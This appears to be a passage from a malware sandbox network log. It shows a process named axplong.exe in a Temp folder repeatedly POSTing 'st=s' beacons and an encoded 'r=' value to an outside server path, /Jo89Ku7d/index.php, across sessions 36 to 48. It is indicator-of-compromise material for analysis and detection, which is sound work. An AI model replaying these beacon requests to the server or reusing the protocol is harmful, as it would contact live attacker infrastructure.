36	192.168.2.4	62795	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:43.968508959 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:44.759453058 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:44.760080099 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:44.989880085 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	62796	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:45.111076117 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:45.839206934 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:45.841726065 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:46.076545954 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	62797	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:46.238616943 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:46.949131012 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:46.949901104 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:47.230307102 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	62798	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:47.343358994 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:48.145020008 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:48.146502018 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:48.478024006 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	62799	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:48.595351934 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:49.380398035 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:49.381222963 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:49.619226933 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	62800	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:49.734205961 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:50.444812059 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:50.445610046 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:50.675717115 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	62801	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:50.799154997 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:51.523658991 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:51.531505108 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:51.774765015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	62802	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:51.905113935 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:52.628562927 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:52.631453991 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:52.860121012 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	62803	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:52.968869925 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:53.698178053 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:53.699625969 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:53.929639101 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	62804	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:54.046569109 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:54.745338917 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:54.746146917 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:54.971054077 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	62805	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:55.093302011 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:55.843205929 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:55.844485044 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:56.087116957 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	62806	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:56.203016043 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:56.902156115 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:56.903167963 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:57.127599001 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	62807	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:57.294256926 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:58.009450912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
